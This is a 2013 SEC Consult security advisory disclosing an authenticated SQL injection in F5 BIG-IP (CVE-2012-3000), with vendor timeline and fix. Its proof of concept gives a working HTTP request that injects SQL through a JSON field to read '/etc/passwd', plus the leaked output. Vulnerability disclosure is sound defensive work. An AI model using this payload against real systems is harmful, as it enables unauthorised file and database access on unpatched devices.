SEC Consult Vulnerability Lab Security Advisory < 20130122-1 > ======================================================================= title: SQL Injection product: F5 BIG-IP vulnerable version: <=11.2.0 fixed version: 11.2.0 HF3 11.2.1 HF3 CVE number: CVE-2012-3000 impact: Medium homepage: http://www.f5.com/ found: 2012-09-03 by: S. Viehböck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "The BIG-IP product suite is a system of application delivery services that work together on the same best-in-class hardware platform or software virtual instance. From load balancing and service offloading to acceleration and security, the BIG-IP system delivers agility—and ensures your applications are fast, secure, and available." URL: http://www.f5.com/products/big-ip/ Vulnerability overview/description: ----------------------------------- A SQL injection vulnerability exists in a BIG-IP component. This enables an authenticated attacker to access the MySQL database with the rights of MySQL user "root" (= highest privileges). Furthermore an attacker can access files in the file system with the rights of the "mysql" OS user. Proof of concept: ----------------- The following exploit shows how files can be extracted from the file system: POST /sam/admin/reports/php/saveSettings.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 119 { "id": 2, "defaultQuery": "XX', ext1=(SELECT MID(LOAD_FILE('/etc/passwd'),0,60)) -- x" } Note: target fields are only VARCHAR(60) thus MID() is used for extracting data. A request to /sam/admin/reports/php/getSettings.php returns the data: HTTP/1.1 200 OK ... {success:true,totalCount:1,rows:[{"id":"2","user":"admin","defaultQuery":"XX","ext1":"root:x:0:0:root:\/root:\/bin\/bash\nbin:x:1:1:bin:\/bin:\/sbin\/nol","ext2":""}]} Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0. Successful exploitation was possible with Application Security (ASM) or Access Policy (APM) enabled. Vendor contact timeline: ------------------------ 2012-10-04: Sending advisory draft and proof of concept. 2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3. 2013-01-22: SEC Consult releases coordinated security advisory. Solution: --------- Update to 11.2.0 HF3 or 11.2.1 HF3. Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF S. Viehböck / @2013